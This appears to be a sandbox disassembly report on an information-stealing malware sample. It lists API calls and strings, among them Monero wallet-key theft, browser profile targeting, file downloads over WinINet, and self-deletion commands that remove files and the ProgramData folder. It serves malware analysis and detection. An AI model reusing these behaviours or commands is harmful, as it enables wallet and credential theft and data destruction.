Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$xBx
API String ID: 2823247455-1587537260
Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

:\, xrefs: 00410A06
QuBi, xrefs: 00410A27
wA, xrefs: 00410B21
C, xrefs: 004109DF

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: wA$:\$C$QuBi
API String ID: 1856320939-1441494722
Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54

Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

Strings

- , xrefs: 004113E6
?, xrefs: 00411263
%s\%s, xrefs: 004112D7

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 1736561257-3278919252
Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

<+A, xrefs: 00406954

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+A
API String ID: 2507841554-2778417545
Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9

Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
lstrlenA.KERNEL32(?), ref: 00416925

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 0041693A
lstrlenA.KERNEL32(?), ref: 00416949
lstrlenA.KERNEL32(00000000), ref: 00416962

Strings

ERROR, xrefs: 00416985
ERROR, xrefs: 0041697E
ERROR, xrefs: 0041696D
ERROR, xrefs: 00416977
ERROR, xrefs: 00416914

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

Stable\, xrefs: 0040ED5B
firefox, xrefs: 0040EE17
Stable\, xrefs: 0040EB71

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9

Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

CopyFileA.KERNEL32(?,?,00000001,0043A99C,004369EF,\Monero\wallet.keys,004369EE), ref: 00401C2A

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 00401C9D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

\Monero\wallet.keys, xrefs: 00401B2F
.keys, xrefs: 00401B0D

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCreateHeaplstrlen$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 2771091047-3586502688
Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58

Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
lstrcatA.KERNEL32(?,?), ref: 00415EC2
lstrcatA.KERNEL32(?,?), ref: 00415ED6
lstrcatA.KERNEL32(?), ref: 00415EE9
lstrcatA.KERNEL32(?,?), ref: 00415EFD
lstrcatA.KERNEL32(?), ref: 00415F10

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9

Strings

LzA, xrefs: 00415FC2

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID: LzA
API String ID: 1968765330-1388989900
Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
